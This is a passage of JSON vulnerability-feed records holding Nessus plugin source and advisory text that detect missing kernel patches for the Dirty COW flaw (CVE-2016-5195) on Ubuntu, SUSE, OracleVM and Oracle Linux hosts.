script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3107-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-26-generic\", pkgver:\"4.8.0-26.28\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-26-generic-lpae\", pkgver:\"4.8.0-26.28\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-26-lowlatency\", pkgver:\"4.8.0-26.28\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.8-generic / linux-image-4.8-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:55", "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-5195: A local privilege escalation using\n MAP_PRIVATE was fixed, which is reportedly exploited in\n the wild (bsc#1004419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-27T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2657-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-27T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-default"], "id": "SUSE_SU-2016-2657-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2657-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94324);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2657-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-5195: A local privilege escalation using\n MAP_PRIVATE was fixed, which is reportedly exploited in\n the wild (bsc#1004419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1004419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5195/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162657-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46c4b780\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1562=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1562=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_54-default-3-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_54-xen-3-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:24:01", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds)\n [Orabug: 24928591] (CVE-2016-5195)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-24T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0150) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-24T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2016-0150.NASL", "href": "https://www.tenable.com/plugins/nessus/94229", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0150.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94229);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0150) (Dirty COW)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds)\n [Orabug: 24928591] (CVE-2016-5195)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-October/000570.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2f842fa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:02", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.13.3.el7uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928591] {CVE-2016-5195}", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-24T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3633) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-24T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el6uek", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2016-3633.NASL", "href": "https://www.tenable.com/plugins/nessus/94224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3633.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94224);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3633) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.13.3.el7uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928591] {CVE-2016-5195}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006429.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006430.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3633\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.13.3.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.13.3.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:50:48", "description": "From Red Hat Security Advisory 2016:2105 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-26T00:00:00", "title": "Oracle Linux 6 : kernel (ELSA-2016-2105) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-26T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2016-2105.NASL", "href": "https://www.tenable.com/plugins/nessus/94264", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2105 and \n# Oracle Linux Security Advisory ELSA-2016-2105 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94264);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2105\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2016-2105) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n 